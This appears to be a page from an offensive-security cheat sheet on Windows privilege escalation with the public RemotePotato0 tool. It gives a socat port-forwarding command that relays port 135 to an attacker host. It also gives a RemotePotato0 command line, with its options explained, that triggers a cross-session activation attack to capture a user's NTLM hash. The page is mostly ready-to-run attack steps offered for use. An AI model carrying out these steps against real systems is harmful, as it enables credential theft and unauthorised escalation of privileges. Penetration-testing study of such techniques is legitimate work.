Windows PrivEsc with RemotePotato
In local machine, start port forwarding.
sudo socat tcp-listen:135,fork,reuseaddr tcp:<remote-ip>:9999
Copied!In target Windows machine, run RemotePotato. We can download the executable from https://github.com/antonioCoco/RemotePotato0.
# -m: Module (2: Rpc capture server + potato trigger)
# -x: Rogue Oxid resolver ip
# -s: Session id for the Cross Session Activation attack
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1
Copied!After that, we might be able to user password (NTLM hash).
References
Last updated